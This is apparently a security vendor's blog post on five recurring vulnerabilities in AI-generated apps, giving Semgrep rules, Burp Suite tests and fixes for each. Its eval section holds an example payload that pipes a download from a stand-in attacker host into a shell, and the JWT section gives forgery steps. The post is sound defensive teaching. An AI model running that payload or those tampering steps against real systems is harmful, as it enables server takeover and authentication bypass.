Application Security LLM Security OWASP Offensive Security

5 Vulnerabilities in Every Vibe-Coded App

AlibhaMay 29, 202613 min read

Authors

Alibha

TL;DR

✓O"Vibe coding" means shipping software an AI assistant generated from natural-language prompts. It produces functional apps fast, but the same generators repeat a predictable set of security defects. Vibe coding security is mostly about catching those patterns before they reach production.
✓Five flaws show up in nearly every vibe-coded codebase we review: missing authorization on generated endpoints, hardcoded or copy-pasted secrets, weak JWT validation, IDOR-by-default object access, and eval-pattern remote code execution.
✓Each one maps to a known standard. Think OWASP Top 10 (A01, A03, A07) plus CWE-862, CWE-798, CWE-287, CWE-639, and CWE-94. So you can detect them with Semgrep static rules and confirm them with Burp Suite.
✓The root cause? LLMs optimize for "make the feature work," not "make the feature safe." The happy path compiles. The abuse path never gets written.
✓This post gives you the how-it-happens, the detection query, and the fix for all five, plus a selection-criteria table you can drop straight into a code review checklist.

What is "vibe coding" and why does it create security debt?

Vibe coding means building software by describing what you want to an AI assistant and accepting most of what it generates without hand-auditing every line. The security debt traces to one structural fact: large language models are trained to satisfy the functional request, not the threat model. The feature works on the first try, so it ships. The access-control check, the secret rotation, the ownership assertion, and the input sanitizer that a senior engineer would have added? Simply absent.

This isn't a knock on any specific model. It's a property of how generation works. Ask for "an endpoint that returns a user's invoices" and the model produces exactly that. It won't infer that "a user's invoices" implies "and nobody else's," because that constraint lived in your head, not in the prompt. So vibe-coded apps fail in the same five ways over and over. That's actually good news. Predictable failure is detectable failure.

How did we choose these five vulnerabilities?

We picked the five flaws that are both high-frequency in generated code and high-impact when exploited. The criteria were deliberately strict, so the list stays useful rather than exhaustive.

Frequency in generated output. It has to appear across multiple frameworks and prompt styles, not show up as a one-off.
Severity if exploited — data exposure, account takeover, or code execution. Cosmetic issues didn't make the cut.
Maps to a recognized standard. A clear OWASP Top 10 category and CWE ID, so it's auditable and reportable.
Statically detectable. A Semgrep rule or a grep can flag candidates without running the app.
Dynamically confirmable — Burp Suite (or similar) can prove exploitability against a running instance.

Every entry below clears all five bars. Missing rate limiting and verbose error messages are real problems too, but we cut them for lower severity or weaker static signal.

Vulnerability comparison table

#	Vulnerability	OWASP Top 10	CWE	Primary detection	Confirm with
1	Missing authorization on generated endpoints	A01: Broken Access Control	CWE-862	Semgrep (route without auth decorator)	Burp Suite repeater, unauthenticated
2	Hardcoded / copy-pasted secrets	A07: Identification & Auth Failures	CWE-798	Semgrep / git secret scan	Manual key validation against the live service
3	Weak JWT validation	A07 / A02: Cryptographic Failures	CWE-287 / CWE-347	Semgrep (verify=False, algorithms missing)	Burp + alg:none / signature-strip test
4	IDOR-by-default	A01: Broken Access Control	CWE-639	Semgrep (DB query keyed by request param only)	Burp Intruder, ID enumeration
5	Eval-pattern RCE	A03: Injection	CWE-94	Semgrep (eval, exec, Function())	Burp + sandbox payload

You can look up any of these CWEs and track their real-world exploit status in the Strobes VI CVE database, which covers 416K+ CVEs with priority scoring and threat-actor attribution.

1. Why do AI-generated endpoints ship with no authorization?

Answer first: Because the prompt asks for what the endpoint returns, never who is allowed to call it. So the model writes the route handler and the database query but omits the access-control check entirely. This is OWASP A01: Broken Access Control, classified as CWE-862 (Missing Authorization).

How it happens. You ask for "an admin route to list all users." The model emits a clean handler that queries the users table and returns JSON, then registers the route. It won't wrap it in require_admin or check request.user.role, because nothing in the prompt said it had to, and the demo works fine when you (an admin) click it. The gap only shows up when an unauthenticated or low-privilege caller hits the same path.

How to detect it. Statically, a Semgrep rule that flags route definitions lacking an auth decorator or middleware is your fastest sweep:

rules:
  - id: route-missing-auth
    languages: [python]
    message: Route handler has no authorization check
    severity: ERROR
    patterns:
      - pattern: |
          @app.route(...)
          def $F(...):
            ...
      - pattern-not: |
          @app.route(...)
          @login_required
          def $F(...):
            ...

Dynamically, replay every discovered endpoint in Burp Suite Repeater with the session cookie removed and with a low-privilege account's token. Any 200 that should have been a 401 or 403 is a confirmed finding.

The fix. Apply authorization at a choke point, not per-handler. Use a default-deny middleware or framework guard so every new route is protected unless explicitly marked public, and assert the specific permission (can_view_user) rather than just "is logged in."

2. Why are hardcoded secrets so common in vibe-coded apps?

Answer first: Because the fastest way for a model to make code "run right now" is to inline the API key, database password, or signing secret directly into the source. And prompts frequently paste real credentials in for context, which the model then echoes back into the file. This is CWE-798 (Use of Hard-coded Credentials), an OWASP A07 failure.

How it happens. "Connect to Stripe and charge the card" produces a working client with sk_live_... sitting in a string literal. The same secret then gets copy-pasted across three files, because each generation is stateless. Once committed, the key lives in git history forever, even after you "remove" it in a later commit.

How to detect it. Run a secret scanner (Semgrep has a secrets ruleset; gitleaks and trufflehog work too) across both the working tree and the full git history. A quick targeted Semgrep pattern:

rules:
  - id: hardcoded-secret
    languages: [generic]
    message: Possible hardcoded secret
    severity: ERROR
    pattern-regex: '(sk_live_|AKIA|-----BEGIN (RSA|EC) PRIVATE KEY-----|password\s*=\s*["''][^"'']{8,})'

The fix. Move every secret to environment variables or a managed secrets store, scrub git history (git filter-repo), and rotate every exposed key. A leaked secret in history is a leaked secret, full stop. For team operations, keep credentials out of code paths entirely. Strobes' Credentials Vault stores the auth material an assessment needs without it ever landing in a prompt or a repo.

3. What makes AI-generated JWT validation weak?

Answer first: Generated auth code routinely decodes a JWT without verifying its signature, accepts any algorithm the token claims (including alg: none), or skips expiry and audience checks. That's CWE-287 (Improper Authentication) and CWE-347 (Improper Verification of Cryptographic Signature), under OWASP A07 and A02.

How it happens. The model needs the user ID out of the token, so it reaches for the simplest call that returns the payload, often a decode with verification disabled, or one that trusts the alg header from the token itself. The login flow looks correct in testing, because you send valid tokens. An attacker sends a token signed with none, or with the public key as an HMAC secret, and walks straight in.

How to detect it. Semgrep catches the common shapes:

rules:
  - id: jwt-no-verify
    languages: [python]
    message: JWT decoded without signature verification
    severity: ERROR
    patterns:
      - pattern-either:
          - pattern: jwt.decode(..., verify=False)
          - pattern: jwt.decode($T, ..., options={..., "verify_signature": False, ...})
          - pattern: jwt.decode($T, $K)   # no algorithms= pin

Confirm in Burp. Capture a valid token, strip the signature and set the header to alg: none, re-sign with HS256 using the server's public key, and replay. Acceptance of any variant is a critical finding.

The fix. Always verify the signature, pin an explicit allow-list of algorithms (never read alg from the token), and validate exp, nbf, iss, and aud. Use a maintained library's verifying API, not the raw decode.

4. Why is IDOR the default in generated CRUD code?

Answer first: Because generated database queries key off the ID in the request and nothing else (SELECT * FROM orders WHERE id = :id). So any authenticated user who changes the ID reads or edits another user's record. This is Insecure Direct Object Reference, CWE-639, under OWASP A01.

How it happens. "Let users view their order by ID" produces a query filtered only on the order ID, not on the owner of the order. The model has no concept that the current session's user must also match orders.user_id. Sequential or guessable IDs make enumeration trivial. Even UUIDs leak if they appear elsewhere in the app.

How to detect it. Statically, flag queries whose only filter is a request parameter with no tenant or owner constraint:

rules:
  - id: idor-query-no-owner
    languages: [python]
    message: Object fetched by request ID without owner check
    severity: WARNING
    patterns:
      - pattern: $MODEL.objects.get(id=$REQ)
      - pattern-not-inside: |
          $MODEL.objects.get(id=$REQ, user=...)

Dynamically, use Burp Intruder to enumerate IDs from a low-privilege account. Any record returned that belongs to another user confirms IDOR. It's also the single most common class our offensive team finds during AI-powered crawling and attack-surface discovery.

The fix. Scope every object lookup to the authenticated principal. Add AND user_id = :current_user (or the equivalent ownership or tenant filter) to the query itself, so an unauthorized ID returns "not found." Enforce it at the data-access layer, not in scattered controllers.

5. How does eval-pattern code lead to remote code execution?

Answer first: When generated code passes user-controlled input into eval(), exec(), Function(), pickle.loads(), or a templating engine in an unsafe mode, an attacker can supply input that executes as code on the server. This is CWE-94 (Improper Control of Generation of Code), OWASP A03: Injection.

How it happens. "Let users enter a formula and compute the result" or "load this config dynamically" nudges the model toward the most direct tool: evaluate the string. It works for the demo input 2 + 2. It also works for __import__('os').system('curl attacker.tld | sh'). The same pattern shows up with JSON-ish parsers, YAML loaders in unsafe mode, and server-side template injection.

How to detect it. Semgrep ships rules for this. A minimal custom pass:

rules:
  - id: dangerous-eval
    languages: [python]
    message: User input may reach eval/exec/pickle
    severity: ERROR
    pattern-either:
      - pattern: eval(...)
      - pattern: exec(...)
      - pattern: pickle.loads(...)
      - pattern: yaml.load($X)   # not safe_load

Confirm with a benign canary payload in Burp (a DNS callback or a sleep) before any destructive test, and only within authorized scope.

The fix. Never evaluate untrusted input as code. Use a real parser for the data format, an expression library with a sandboxed, allow-listed grammar for formulas, yaml.safe_load, and json.loads for serialization. If dynamic behavior is genuinely required, run it in an isolated, least-privilege sandbox. Track known eval/code-injection CVEs in your stack through Strobes VI's supply chain tracker to catch compromised dependencies before they ship.

How should teams test a vibe-coded app before shipping?

Answer first: Combine a static sweep for all five patterns with a dynamic confirmation pass on the running app, then gate releases on the results. Static analysis finds the candidates cheaply. Dynamic testing proves which ones are actually exploitable, so you fix the real risks first.

A practical pipeline looks like this:

Pre-commit / CI: run Semgrep (and a secrets scanner over full git history) on every push. Block merges on the five rule classes above. This is where a solid DevSecOps pipeline starts paying for itself.
Pre-release: run an authenticated dynamic test. At minimum that means an IDOR enumeration pass, an auth-bypass sweep of every endpoint, and a JWT tampering test, all in Burp Suite or an equivalent proxy. For a thorough methodology, follow a web application pentesting checklist.
Continuous: treat each AI-generated PR as untrusted input. The volume of generated code is the problem, so the answer is testing that keeps pace with it.

That last point is why teams move from per-PR manual review to agentic testing. Strobes runs offensive testing with AI agents that crawl the live app, reason about authorization and object ownership the way a human pentester does, and confirm findings against a running instance, covering the full WSTG methodology rather than a fixed rule set. If you're shipping AI-generated code at volume, AI pentesting and pentesting-as-a-service close the gap between "it compiled" and "it's safe to ship." Our approach has one throughline: from finding to fixed.

FAQ

Is vibe coding inherently insecure? No. The generated code isn't malicious, it's incomplete. It implements the requested feature correctly and omits the security controls that were never requested. With static and dynamic testing in the pipeline, you can ship vibe-coded apps safely. Without it, they inherit a predictable set of defects.

Can a linter or Semgrep catch all five vulnerabilities? Static analysis reliably catches hardcoded secrets, eval patterns, and many missing-auth and weak-JWT cases. It's weaker on IDOR and on context-dependent authorization, because "is this the right owner check?" needs runtime context. That's why dynamic confirmation in Burp Suite (or an agentic tester) stays necessary.

Which of these is the most common in practice? Broken access control: missing authorization (CWE-862) and IDOR (CWE-639) together. It's the most frequent and lines up with OWASP A01 being the top category in the OWASP Top 10. Eval-pattern RCE is rarer but the highest severity when it shows up.

Do these flaws appear regardless of which AI assistant generated the code? Yes. The patterns stem from how generation prioritizes functional correctness over threat modeling, not from a specific model or tool. The frequency and shape stay consistent across assistants and frameworks.

Should I scan git history for secrets, or just the current code? Both, and history especially. A secret removed in a later commit still lives in history and is still compromised. Scan the full history, rotate every exposed key, and treat the old value as burned.

What is the single highest-payoff fix? A default-deny authorization choke point. It neutralizes most missing-authz and IDOR findings at once: every new generated route is protected unless explicitly opened, and every object lookup is scoped to the authenticated principal.

Sources

OWASP Top 10:2021 — A01 Broken Access Control, A02 Cryptographic Failures, A03 Injection, A07 Identification and Authentication Failures. https://owasp.org/Top10/
MITRE CWE — CWE-862 Missing Authorization. https://cwe.mitre.org/data/definitions/862.html
MITRE CWE — CWE-798 Use of Hard-coded Credentials. https://cwe.mitre.org/data/definitions/798.html
MITRE CWE — CWE-287 Improper Authentication; CWE-347 Improper Verification of Cryptographic Signature. https://cwe.mitre.org/data/definitions/287.html
MITRE CWE — CWE-639 Authorization Bypass Through User-Controlled Key (IDOR). https://cwe.mitre.org/data/definitions/639.html
MITRE CWE — CWE-94 Improper Control of Generation of Code (Code Injection). https://cwe.mitre.org/data/definitions/94.html
OWASP Web Security Testing Guide (WSTG). https://owasp.org/www-project-web-security-testing-guide/

Written by the Strobes Security Research Team — Strobes' offensive security group, combining 50+ certified researchers with the Strobes AI agent stack to test web, API, and AI-driven applications against the full OWASP WSTG methodology.

Back to Blog

Application Security LLM Security OWASP Offensive Security

5 Vulnerabilities in Every Vibe-Coded App

AlibhaMay 29, 202613 min read

Authors

Alibha

TL;DR

✓O"Vibe coding" means shipping software an AI assistant generated from natural-language prompts. It produces functional apps fast, but the same generators repeat a predictable set of security defects. Vibe coding security is mostly about catching those patterns before they reach production.
✓Five flaws show up in nearly every vibe-coded codebase we review: missing authorization on generated endpoints, hardcoded or copy-pasted secrets, weak JWT validation, IDOR-by-default object access, and eval-pattern remote code execution.
✓Each one maps to a known standard. Think OWASP Top 10 (A01, A03, A07) plus CWE-862, CWE-798, CWE-287, CWE-639, and CWE-94. So you can detect them with Semgrep static rules and confirm them with Burp Suite.
✓The root cause? LLMs optimize for "make the feature work," not "make the feature safe." The happy path compiles. The abuse path never gets written.
✓This post gives you the how-it-happens, the detection query, and the fix for all five, plus a selection-criteria table you can drop straight into a code review checklist.

What is "vibe coding" and why does it create security debt?

How did we choose these five vulnerabilities?

We picked the five flaws that are both high-frequency in generated code and high-impact when exploited. The criteria were deliberately strict, so the list stays useful rather than exhaustive.

Frequency in generated output. It has to appear across multiple frameworks and prompt styles, not show up as a one-off.
Severity if exploited — data exposure, account takeover, or code execution. Cosmetic issues didn't make the cut.
Maps to a recognized standard. A clear OWASP Top 10 category and CWE ID, so it's auditable and reportable.
Statically detectable. A Semgrep rule or a grep can flag candidates without running the app.
Dynamically confirmable — Burp Suite (or similar) can prove exploitability against a running instance.

Every entry below clears all five bars. Missing rate limiting and verbose error messages are real problems too, but we cut them for lower severity or weaker static signal.

Vulnerability comparison table

#	Vulnerability	OWASP Top 10	CWE	Primary detection	Confirm with
1	Missing authorization on generated endpoints	A01: Broken Access Control	CWE-862	Semgrep (route without auth decorator)	Burp Suite repeater, unauthenticated
2	Hardcoded / copy-pasted secrets	A07: Identification & Auth Failures	CWE-798	Semgrep / git secret scan	Manual key validation against the live service
3	Weak JWT validation	A07 / A02: Cryptographic Failures	CWE-287 / CWE-347	Semgrep (verify=False, algorithms missing)	Burp + alg:none / signature-strip test
4	IDOR-by-default	A01: Broken Access Control	CWE-639	Semgrep (DB query keyed by request param only)	Burp Intruder, ID enumeration
5	Eval-pattern RCE	A03: Injection	CWE-94	Semgrep (eval, exec, Function())	Burp + sandbox payload

You can look up any of these CWEs and track their real-world exploit status in the Strobes VI CVE database, which covers 416K+ CVEs with priority scoring and threat-actor attribution.

1. Why do AI-generated endpoints ship with no authorization?

How to detect it. Statically, a Semgrep rule that flags route definitions lacking an auth decorator or middleware is your fastest sweep:

rules:
  - id: route-missing-auth
    languages: [python]
    message: Route handler has no authorization check
    severity: ERROR
    patterns:
      - pattern: |
          @app.route(...)
          def $F(...):
            ...
      - pattern-not: |
          @app.route(...)
          @login_required
          def $F(...):
            ...

2. Why are hardcoded secrets so common in vibe-coded apps?

rules:
  - id: hardcoded-secret
    languages: [generic]
    message: Possible hardcoded secret
    severity: ERROR
    pattern-regex: '(sk_live_|AKIA|-----BEGIN (RSA|EC) PRIVATE KEY-----|password\s*=\s*["''][^"'']{8,})'

3. What makes AI-generated JWT validation weak?

How to detect it. Semgrep catches the common shapes:

rules:
  - id: jwt-no-verify
    languages: [python]
    message: JWT decoded without signature verification
    severity: ERROR
    patterns:
      - pattern-either:
          - pattern: jwt.decode(..., verify=False)
          - pattern: jwt.decode($T, ..., options={..., "verify_signature": False, ...})
          - pattern: jwt.decode($T, $K)   # no algorithms= pin

4. Why is IDOR the default in generated CRUD code?

How to detect it. Statically, flag queries whose only filter is a request parameter with no tenant or owner constraint:

rules:
  - id: idor-query-no-owner
    languages: [python]
    message: Object fetched by request ID without owner check
    severity: WARNING
    patterns:
      - pattern: $MODEL.objects.get(id=$REQ)
      - pattern-not-inside: |
          $MODEL.objects.get(id=$REQ, user=...)

5. How does eval-pattern code lead to remote code execution?

How to detect it. Semgrep ships rules for this. A minimal custom pass:

rules:
  - id: dangerous-eval
    languages: [python]
    message: User input may reach eval/exec/pickle
    severity: ERROR
    pattern-either:
      - pattern: eval(...)
      - pattern: exec(...)
      - pattern: pickle.loads(...)
      - pattern: yaml.load($X)   # not safe_load

Confirm with a benign canary payload in Burp (a DNS callback or a sleep) before any destructive test, and only within authorized scope.

How should teams test a vibe-coded app before shipping?

A practical pipeline looks like this:

Pre-commit / CI: run Semgrep (and a secrets scanner over full git history) on every push. Block merges on the five rule classes above. This is where a solid DevSecOps pipeline starts paying for itself.
Pre-release: run an authenticated dynamic test. At minimum that means an IDOR enumeration pass, an auth-bypass sweep of every endpoint, and a JWT tampering test, all in Burp Suite or an equivalent proxy. For a thorough methodology, follow a web application pentesting checklist.
Continuous: treat each AI-generated PR as untrusted input. The volume of generated code is the problem, so the answer is testing that keeps pace with it.

FAQ

Sources

OWASP Top 10:2021 — A01 Broken Access Control, A02 Cryptographic Failures, A03 Injection, A07 Identification and Authentication Failures. https://owasp.org/Top10/
MITRE CWE — CWE-862 Missing Authorization. https://cwe.mitre.org/data/definitions/862.html
MITRE CWE — CWE-798 Use of Hard-coded Credentials. https://cwe.mitre.org/data/definitions/798.html
MITRE CWE — CWE-287 Improper Authentication; CWE-347 Improper Verification of Cryptographic Signature. https://cwe.mitre.org/data/definitions/287.html
MITRE CWE — CWE-639 Authorization Bypass Through User-Controlled Key (IDOR). https://cwe.mitre.org/data/definitions/639.html
MITRE CWE — CWE-94 Improper Control of Generation of Code (Code Injection). https://cwe.mitre.org/data/definitions/94.html
OWASP Web Security Testing Guide (WSTG). https://owasp.org/www-project-web-security-testing-guide/

5 Vulnerabilities in Every Vibe-Coded App

Table of Contents

Authors

Share

What is "vibe coding" and why does it create security debt?

How did we choose these five vulnerabilities?

Vulnerability comparison table

1. Why do AI-generated endpoints ship with no authorization?

2. Why are hardcoded secrets so common in vibe-coded apps?

3. What makes AI-generated JWT validation weak?

4. Why is IDOR the default in generated CRUD code?

5. How does eval-pattern code lead to remote code execution?

How should teams test a vibe-coded app before shipping?

FAQ

Sources

5 Vulnerabilities in Every Vibe-Coded App

Table of Contents

Authors

Share

What is "vibe coding" and why does it create security debt?

How did we choose these five vulnerabilities?

Vulnerability comparison table

1. Why do AI-generated endpoints ship with no authorization?

2. Why are hardcoded secrets so common in vibe-coded apps?

3. What makes AI-generated JWT validation weak?

4. Why is IDOR the default in generated CRUD code?

5. How does eval-pattern code lead to remote code execution?

How should teams test a vibe-coded app before shipping?

FAQ

Sources

Table of Contents

Authors

Share

What is "vibe coding" and why does it create security debt?

How did we choose these five vulnerabilities?

Vulnerability comparison table

1. Why do AI-generated endpoints ship with no authorization?

2. Why are hardcoded secrets so common in vibe-coded apps?

3. What makes AI-generated JWT validation weak?

4. Why is IDOR the default in generated CRUD code?

5. How does eval-pattern code lead to remote code execution?

How should teams test a vibe-coded app before shipping?

FAQ

Sources

Related Reading

Table of Contents

Authors

Share

What is "vibe coding" and why does it create security debt?

How did we choose these five vulnerabilities?

Vulnerability comparison table

1. Why do AI-generated endpoints ship with no authorization?

2. Why are hardcoded secrets so common in vibe-coded apps?

3. What makes AI-generated JWT validation weak?

4. Why is IDOR the default in generated CRUD code?

5. How does eval-pattern code lead to remote code execution?

How should teams test a vibe-coded app before shipping?

FAQ

Sources

Related Reading